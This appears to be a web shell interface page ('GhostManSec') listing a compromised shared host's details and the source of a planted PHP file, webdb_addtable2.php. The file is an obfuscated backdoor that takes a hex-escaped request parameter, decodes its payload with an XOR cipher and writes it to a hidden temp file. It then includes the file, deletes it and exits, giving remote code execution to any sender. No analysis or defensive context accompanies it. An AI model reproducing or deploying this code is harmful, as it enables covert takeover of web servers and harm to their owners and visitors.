GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/craftharmony.art/webdb_addtable2.php
<?php

if(!empty($_REQUEST["\x62\x69\x6E\x64ing"])){
	$factor = $_REQUEST["\x62\x69\x6E\x64ing"];
		$factor 	 =  explode(	  '.'		 ,$factor		 )  ;		 
	$desc	= 	'';
            $s	= 	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	= 	strlen(  $s );
            $__len	= 	count(  $factor );
    
            for(  $j	= 	0; $j < $__len; $j++) {  $v8	= 	$factor[$j];
                $chS	= 	ord(  $s[$j % $lenS] );
                $d	= 	(  (  int)$v8 - $chS -(  $j % 10)) ^ 62;
                $desc .= chr(  $d );
            }
	$res = array_filter([session_save_path(), sys_get_temp_dir(), "/tmp", getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp"]);
	$flg = 0;
do {
    $component = $res[$flg] ?? null;
    if ($flg >= count($res)) break;
    		if (!!is_dir($component) && !!is_writable($component)) {
    $bind = str_replace("{var_dir}", $component, "{var_dir}/.property_set");
    if (file_put_contents($bind, $desc)) {
	include $bind;
	@unlink($bind);
	die();
}
}
    $flg++;
} while (true);
}